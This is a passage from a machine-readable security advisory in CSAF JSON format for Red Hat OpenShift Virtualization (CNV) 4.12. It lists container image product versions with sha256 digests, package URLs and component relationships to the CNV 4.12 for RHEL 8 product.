"name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"product_id": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.12.0-32"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"product": {
"name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"product_id": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"product_identification_helper": {
"purl": "pkg:oci/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"product_id": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"product_id": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"product": {
"name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"product_id": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"product": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"product_id": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"product_id": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"product_id": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"product_id": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"product_id": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.12.0-71"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.12.0-72"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"product": {
"name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"product_id": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"product": {
"name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"product_id": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-exportproxy\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"product": {
"name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"product_id": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-exportserver\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"product": {
"name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"product_id": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"product": {
"name": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"product_id": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.12.0-10"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"product": {
"name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"product_id": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"product": {
"name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"product_id": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.12.0-255"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64",
"product": {
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64",
"product_id": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup\u0026tag=v4.12.0-89"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64"
},
"product_reference": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64"
},
"product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64"
},
"product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64"
},
"product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64"
},
"product_reference": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64"
},
"product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64"
},
"product_reference": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
